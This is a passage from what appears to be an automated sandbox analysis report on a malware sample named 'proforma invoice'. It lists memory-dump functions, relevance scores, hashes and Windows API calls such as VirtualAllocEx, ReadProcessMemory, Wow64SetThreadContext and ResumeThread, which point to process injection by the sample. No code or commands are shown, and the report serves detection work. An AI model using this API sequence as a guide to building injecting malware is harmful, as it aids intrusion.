Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 094664C8

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2d9b6114b2c0fbd74663468af815f8342d34ec3fae441d128dfdc9ba24baa7b7
Instruction ID: 42ce8dc3ce5fde5cbf295c0a41a12b0049b0da82001a4238f973e0f1da136f5a
Opcode Fuzzy Hash: 2d9b6114b2c0fbd74663468af815f8342d34ec3fae441d128dfdc9ba24baa7b7
Instruction Fuzzy Hash: F62116B18002499FDF10CFAAC9847EEBBF1FF48314F14842AE518A7250C7789955CBA5

Function 09465DC0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09465E3E

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6962a3d371e5882a678c1ebd6c85f4f9100770d53f3116a6c10d286233f2e357
Instruction ID: f49e0c20a0301b2cb51b9cbd2e622abef6966761bc1c8b0cdbd91526e125fd6c
Opcode Fuzzy Hash: 6962a3d371e5882a678c1ebd6c85f4f9100770d53f3116a6c10d286233f2e357
Instruction Fuzzy Hash: FB2115B19003098FEB10DFAAC4847EEBBF4EF48214F14842AE559A7350D7789945CFA5

Function 09466448 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 094664C8

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7d0589333d1d61323d6c8b02ae3d529928b484d66c08e1faa29c3b0eafa4ad2b
Instruction ID: 2644ca8603460d7054667d79a63ed38825886864bcb42a53fc324cd929f2b3fc
Opcode Fuzzy Hash: 7d0589333d1d61323d6c8b02ae3d529928b484d66c08e1faa29c3b0eafa4ad2b
Instruction Fuzzy Hash: 8D2114B18003499FDB10DFAAC884BEEBBF5FF48310F50842AE518A7250C7789955CBA5

Function 09465E90 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09465F06

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7f396ba1f168f0d4970312ea84ce51b7f27823263485b11429491a16f9056250
Instruction ID: b7b45e7d167155211bd491726e4db0f30e05b85e66e77186c75a808385e21458
Opcode Fuzzy Hash: 7f396ba1f168f0d4970312ea84ce51b7f27823263485b11429491a16f9056250
Instruction Fuzzy Hash: 762164728003489FDF10DFAAC844BDEBFF4EF48310F14841AE619A7260CB79A945CBA1

Function 09465D08 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09465D72

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 212335f7a3bc9f4921fef2a2eaeb0755c23b7b1ac6c12e63126e3b6a8616131c
Instruction ID: 1779f5480eb451ed5f31fe691624a27ef0e427c0a6ab491194a1edea5099fc43
Opcode Fuzzy Hash: 212335f7a3bc9f4921fef2a2eaeb0755c23b7b1ac6c12e63126e3b6a8616131c
Instruction Fuzzy Hash: 141146B18103488FDB14DFAAD4497EEBBF4EF88214F10842AD519A7350CB796945CF91

Function 09465E98 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09465F06

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7c6cb876cfb292e1e8b8ca7f7dc33db0f353c30133fa985d006b11b1cba53c90
Instruction ID: 120aa6809b0cc73a329ab5a9a897c949f6436b863179ef6fd9cb1b0ac50f2e65
Opcode Fuzzy Hash: 7c6cb876cfb292e1e8b8ca7f7dc33db0f353c30133fa985d006b11b1cba53c90
Instruction Fuzzy Hash: B71123B28003099BDF14DFAAC844BDEBBF5EB48314F14882AE519A7250C779A954CBA1

Function 094660AB Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0946A145

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 171b1ee42d32620c8262191939da971ed5b33b87044a964144282c79816240eb
Instruction ID: bf05d4e060c4fcb9649db24150cfaccc262f72034a18155e5b2cd19c4531b0a2
Opcode Fuzzy Hash: 171b1ee42d32620c8262191939da971ed5b33b87044a964144282c79816240eb
Instruction Fuzzy Hash: CC11E3B5800749DFDB10CF9AD584BDEBBF8EB48324F10841AE558B7210C375A984CFA5

Function 09465D10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09465D72

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d3231dbedfed72b374c961ce97b461017c986221ff98ffc0e21aabda5c8cfb49
Instruction ID: e2f04b6243c0413b1f61ddd311344d90cb6efae5e46cee94350f9e31080f9b91
Opcode Fuzzy Hash: d3231dbedfed72b374c961ce97b461017c986221ff98ffc0e21aabda5c8cfb49
Instruction Fuzzy Hash: FA1136B19103498FDB14DFAAC4487DEFBF4EF88214F14882AD519A7350CB79A944CBA5

Function 09466030 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0946A145

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d09d6372f6cca3d196fd93b18d2c4e21394c561420c8328d0d9b0940acf0fcb3
Instruction ID: 0aebd4cc54209e2edcce253def73f4b05a580a60394b0a3802e4d9614c819ce9
Opcode Fuzzy Hash: d09d6372f6cca3d196fd93b18d2c4e21394c561420c8328d0d9b0940acf0fcb3
Instruction Fuzzy Hash: FB11F2B58007489FDB20CF9AD988BDEBBF8EB48314F10845AE518B7310D375A944CFA1

Function 0946A0E2 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0946A145

Memory Dump Source

Source File: 00000000.00000002.1382156117.0000000009460000.00000040.00000800.00020000.00000000.sdmp, Offset: 09460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9460000_proforma invoice.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 794197c587c9bf6b4af80e943b7bf7eb0f80ea4a0b66a308f87cb896cd620326
Instruction ID: 7395c97ae7b460bc7b3c64cb9ddd75901e8a9607656a18c73be0d5ca366c0f20
Opcode Fuzzy Hash: 794197c587c9bf6b4af80e943b7bf7eb0f80ea4a0b66a308f87cb896cd620326
Instruction Fuzzy Hash: B411E0B58006489FDB10CF9AC585BDEBBF4EB48310F10845AE958A7310C374A944CFA1

Function 00AD3E71 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

_=!, xrefs: 00AD3F1C

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID: _=!
API String ID: 0-1823989621
Opcode ID: d4f32314959371c2eeededcb3b2328354f7a605006cb850e3a8f77d63e0f6a29
Instruction ID: c2f2772b0e7499e7678dbb6dfa02d58def7802d4c8b783cc666cff2557b272a9
Opcode Fuzzy Hash: d4f32314959371c2eeededcb3b2328354f7a605006cb850e3a8f77d63e0f6a29
Instruction Fuzzy Hash: 8B31F675E052099FCB08CFAAC5845AEFBB2FB88300F14896AC41AA7354D7749A45CB55

Function 00ADB8DF Relevance: .7, Instructions: 702COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d43080e985d79bafc5242247605033f4f1583b5852a328aff3a726bf7a00fc
Instruction ID: f6af76c374108ecfa1f140648854c29832dc512911671b5d29086164dca3a18a
Opcode Fuzzy Hash: f8d43080e985d79bafc5242247605033f4f1583b5852a328aff3a726bf7a00fc
Instruction Fuzzy Hash: 53724870A01A4ADFDB19EF60E858AACB7B1FF86300F118599D045AB361DF30AE44DF95

Function 00ADB930 Relevance: .7, Instructions: 696COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a950d5267e73ddd9cf1d709055b374711d4d6361cfdd72627969006cd33738d5
Instruction ID: ac0962e7ab5ee372475fdfdf2a988f0dd787b832559b0acf65a4b0bbf4cbd151
Opcode Fuzzy Hash: a950d5267e73ddd9cf1d709055b374711d4d6361cfdd72627969006cd33738d5
Instruction Fuzzy Hash: 48724870A00A4ADFDB19EF60E8586ECB7B1FF86300F1185A9D045AB361DF30AE449F95

Function 00ADB940 Relevance: .7, Instructions: 688COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ecabc9ce52249729addf54355505754cbdbbc8e810ce5c3959d61c4b4717e19
Instruction ID: 6b8e8688869a4a1c2f2ce6ccddce2562840b3c954ae5c05b3af06a06d2128687
Opcode Fuzzy Hash: 9ecabc9ce52249729addf54355505754cbdbbc8e810ce5c3959d61c4b4717e19
Instruction Fuzzy Hash: A4723870E00A4ADFDB19EF60E858AACB7B1FF86300F118599D045AB361DF30AE449F95

Function 00AD9C14 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9431d8e388786955833c1b3b26abfd72d2bd83c50066d9a53ed8456b5283ad3
Instruction ID: 8891f36bcedd2ba176569dc5f0ea5dd5e16da93e5c9afb7367b09e5e247891d0
Opcode Fuzzy Hash: f9431d8e388786955833c1b3b26abfd72d2bd83c50066d9a53ed8456b5283ad3
Instruction Fuzzy Hash: 0AA17535A10605CFCB04DF69C88899DBBB1FF89310F1186A9E505AB366EB71ED85CF80

Function 00ADF9C0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59f608a75b3a0260a585bc0948b4ebf7f387cdc830d085a2d3d3e4bb92d8e328
Instruction ID: 0de6e654c00ce4677fc03c160ddef612fc6b5ebd27f9d2fa026da8a0a70b659a
Opcode Fuzzy Hash: 59f608a75b3a0260a585bc0948b4ebf7f387cdc830d085a2d3d3e4bb92d8e328
Instruction Fuzzy Hash: 11716370100B41CFD324DF25D848B5BBBF2BF88314F108A6DD09A8B7A1DB75A949CB91

Function 00ADDB48 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1ffa0dde23d96eb1b5f9db10d6b805201fe4c5692d1c72fdf3a62157b618d4
Instruction ID: bc74e867f161688bd0cdc58d280294bc4a3b4f5cf57f6ed9aeb1b903395bf2cc
Opcode Fuzzy Hash: ac1ffa0dde23d96eb1b5f9db10d6b805201fe4c5692d1c72fdf3a62157b618d4
Instruction Fuzzy Hash: B0215134705A068BEB24EB39D5007AE7BF5AB98748F144467C806C7348E775EE06CBC5

Function 005ED4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343151278.00000000005ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 005ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e856ad3cd8363793604acc5fda7a8d197d685fbe857e5322023916f5518bf7c
Instruction ID: 173b226f271706faa5dbfb09fd59dc79a9cda9d0a4405710df4a7cd73d53aea4
Opcode Fuzzy Hash: 3e856ad3cd8363793604acc5fda7a8d197d685fbe857e5322023916f5518bf7c
Instruction Fuzzy Hash: 3D2136B2500280DFDF09DF04D9C0B26BFB5FB98318F30856AD8450A296C336D856CBB2

Function 00ADA630 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc35157d8b5d23540d7ef977bc71db4d2fa2759e6228c726d61b373b4e17fa8
Instruction ID: 57709a1d3223e288b6612dbe94888e4472d99eefeac0f16903ccadf7eeeb810c
Opcode Fuzzy Hash: abc35157d8b5d23540d7ef977bc71db4d2fa2759e6228c726d61b373b4e17fa8
Instruction Fuzzy Hash: 7021B0716042428FDB45DF28D8417D6FBE2FF89314F1986BAE80ADF386D6749845CB90

Function 005FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343199414.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ad51dc71065e136955a4c0076d1330f0d2297642a94dc69afb2e527257f283
Instruction ID: d57aeb4edb580b0be64ad76eaaf16f64bf056dea0d6266cdc2ba0694fc3fa05d
Opcode Fuzzy Hash: b5ad51dc71065e136955a4c0076d1330f0d2297642a94dc69afb2e527257f283
Instruction Fuzzy Hash: 1421D375504248DFDB14DF14D5C8B26BFBAFB84314F20C969DA094B286DB3AD847CA72

Function 005FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343199414.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d172cca16e28bf5a4fcbf40dcd655093910ec271be5e0cad742afa35eee27597
Instruction ID: eacf5704f5c382a888dcd638a6f7a2594053b9cd924a56f0a6eb958dd4fec29a
Opcode Fuzzy Hash: d172cca16e28bf5a4fcbf40dcd655093910ec271be5e0cad742afa35eee27597
Instruction Fuzzy Hash: A421F579504248EFDB05DF10D5C0B26BFB6FB84314F20C969DA094B292C33AD846CAB1

Function 00AD9B94 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ccfa6886f806940e28937014a25de29f21ba462adc21f38b83b7aeb483f66fa
Instruction ID: 8750cfea018268fc26122bc361cbda61eb0fe233cc1f777b792062f5ae8dc4eb
Opcode Fuzzy Hash: 2ccfa6886f806940e28937014a25de29f21ba462adc21f38b83b7aeb483f66fa
Instruction Fuzzy Hash: 10216F716002058BDB44EF2DD841786F7E6FF89314B19C6BAE90ADF386DA74E8458B90

Function 00ADA7F0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 644666b7136dd45b60a930aff42289ef4a2179060068e4a7fc106cf28b8dd2bc
Instruction ID: f38287961606eb2e5f58e124705b23fbb2137c0d34b6f68d1afca8586fc0157d
Opcode Fuzzy Hash: 644666b7136dd45b60a930aff42289ef4a2179060068e4a7fc106cf28b8dd2bc
Instruction Fuzzy Hash: 97210431A007428BDB019F68C844396B771FFD5310F25867AD889BB783EB76A985CB90

Function 00ADDDF0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2263e0956e7abdabff0dbed71a474c46a15fc2678dfb4d58b32743dc395d5db7
Instruction ID: 5caba58d4bbb43e712f8fb5aefce97847aa2742186032fb037561a505a6b5a76
Opcode Fuzzy Hash: 2263e0956e7abdabff0dbed71a474c46a15fc2678dfb4d58b32743dc395d5db7
Instruction Fuzzy Hash: 9821BE347006069BEB18EB7AC905B7A77F6BB84700F14487AD456EF384EE71E9018BA1

Function 00AD3AC9 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f3e3f99fb2480d2ac1e00d0eb0faccb8e028466f933c77e0b61702e06ad937
Instruction ID: 9992bfbe36d890fa1d20e501e6056437216dd9887c65d5a2a513af444b7a7ee0
Opcode Fuzzy Hash: 06f3e3f99fb2480d2ac1e00d0eb0faccb8e028466f933c77e0b61702e06ad937
Instruction Fuzzy Hash: EB212AB0E05249DFDF04DFA9C545AAEFBB1BF89300F20C5AAC505AB255D7708B41DB41

Function 00AD9BE4 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882b40dd5dd3e1f8996a2d6207741d5829b11017f1332d888adaf4585133d105
Instruction ID: 7ed3cef0edb01aeacb2b4acee8f3276ef3a71ec1afe4188c81d7fc028ae6ad02
Opcode Fuzzy Hash: 882b40dd5dd3e1f8996a2d6207741d5829b11017f1332d888adaf4585133d105
Instruction Fuzzy Hash: 3C21D231A007068BDB00AF68C844396B372FFD4314F248A76E9897B382DF76B9958790

Function 005FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343199414.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22673bbb2ab202644791af20931e10597e07415ea795a9d3c42c02b84ffaff8e
Instruction ID: f347ee9f2600ff292ff0e4f9fd42ae0e365f6fb75215a823e7bc1aef83b0f8bc
Opcode Fuzzy Hash: 22673bbb2ab202644791af20931e10597e07415ea795a9d3c42c02b84ffaff8e
Instruction Fuzzy Hash: F2218E755093848FCB02CF24D994715BF72FB46314F28C5EBD9498B6A7C33A980ACB62

Function 00AD3BCB Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157920fd28c5c49bdfd2ee37af3fffcfe9bf39f7cd67dee306381903c67b0a26
Instruction ID: 389721ae7fc815ef76aa19ff6897b7bcf26c368752a847101e946c4f9764913a
Opcode Fuzzy Hash: 157920fd28c5c49bdfd2ee37af3fffcfe9bf39f7cd67dee306381903c67b0a26
Instruction Fuzzy Hash: DA211475E04208EFCB08DFA9C994A9EFBF2FF88300F14C4AAD419A7364D6309A01DB00

Function 00AD3BD0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66cdf875934979873c702af0f26be6b741d44fc7f9d249fac8238d87ab07cf9d
Instruction ID: 5ad6a51ef3addf83c1acff412acabdf7d29fa0884e7f6b7dd4620ba46d5232b1
Opcode Fuzzy Hash: 66cdf875934979873c702af0f26be6b741d44fc7f9d249fac8238d87ab07cf9d
Instruction Fuzzy Hash: 8111EA75E04108DFDB48DFA9D544AADBBF2FF88300F15C49AD419A7364D7309A01DB41

Function 005ED49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343151278.00000000005ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 005ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction ID: 0361d086747f3dbdadacf1921f361df296591d070e3c71cc5ddf9efadeca7fbd
Opcode Fuzzy Hash: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction Fuzzy Hash: 4711B1B6504280CFCB16CF14D5C4B56BF71FB84324F24C5AAD9490B656C336D856CBA2

Function 005FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343199414.00000000005FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a796e63cb759f2b5a785b18c00e1c38df81079df420df4383ba63ef2e6e952
Instruction ID: 23e2bcac53109b40c04e166c24fc7c10ee3b4a545ef60fffa71ca9c18e33b9d8
Opcode Fuzzy Hash: 01a796e63cb759f2b5a785b18c00e1c38df81079df420df4383ba63ef2e6e952
Instruction Fuzzy Hash: 40118B79504284DFCB16CF10D5C4B25BFB2FB84314F24C6AAD9494B696C33AD84ACBA1

Function 00ADEFF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3c6e2f46c7a87df2fdbeda6243a152e32b337fab871bbbbb7c98e8bc617280
Instruction ID: d960a204a561d0d2e25c112ac12c4e426c085d9be73f89e9138dd020c4786f4f
Opcode Fuzzy Hash: cd3c6e2f46c7a87df2fdbeda6243a152e32b337fab871bbbbb7c98e8bc617280
Instruction Fuzzy Hash: B401D871300304ABDB249F25DC45F5B77A6EBC4710F108529FA078B2D4CBB1ED518790

Function 00ADDCC0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec69ec42e2dbde695bcc68191ce3cf0e5687ce6fb07dfa076cfff5eaef453bb5
Instruction ID: c91691f92b003b7334d004bd464fad9948f4dfaaebb9cf6b93ff467dfdce1b71
Opcode Fuzzy Hash: ec69ec42e2dbde695bcc68191ce3cf0e5687ce6fb07dfa076cfff5eaef453bb5
Instruction Fuzzy Hash: 3E018874E00709DBE708FFB5D45575DBBF1FF88301F1085A8D5056B398EA715A018791

Function 00AD9BB4 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82fb7b6fec21c9b2884166b665482d9d0d5dcc6b05684022bf6d6c462b27ef7
Instruction ID: e89e521fbd211e9d78d7cb9819538816496c7dd0844ddf4367c88375c891ad5a
Opcode Fuzzy Hash: b82fb7b6fec21c9b2884166b665482d9d0d5dcc6b05684022bf6d6c462b27ef7
Instruction Fuzzy Hash: 64F0C83130430147E700AF5D989578673B6FFC4324F144676E90EAF3C2DB76984487A0

Function 00ADA747 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30469f813891c7ca4cd10c308ff281bdfdb0da5700a1d829ec8c815fda541afe
Instruction ID: 90cce57ee8c1aa25be8750beb3720f1792b3fdc474146e86a168f97a8402fb6a
Opcode Fuzzy Hash: 30469f813891c7ca4cd10c308ff281bdfdb0da5700a1d829ec8c815fda541afe
Instruction Fuzzy Hash: 60F0F6317042004BEB10AF6C9895B8677A6FFC4324F14437AE94DAF3C2CBB5584587A0

Function 00AD0838 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343768375.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6129071acbe0700f05f46f3b880ec6a09eddcec26ec97b84ed3d53acd9466f08
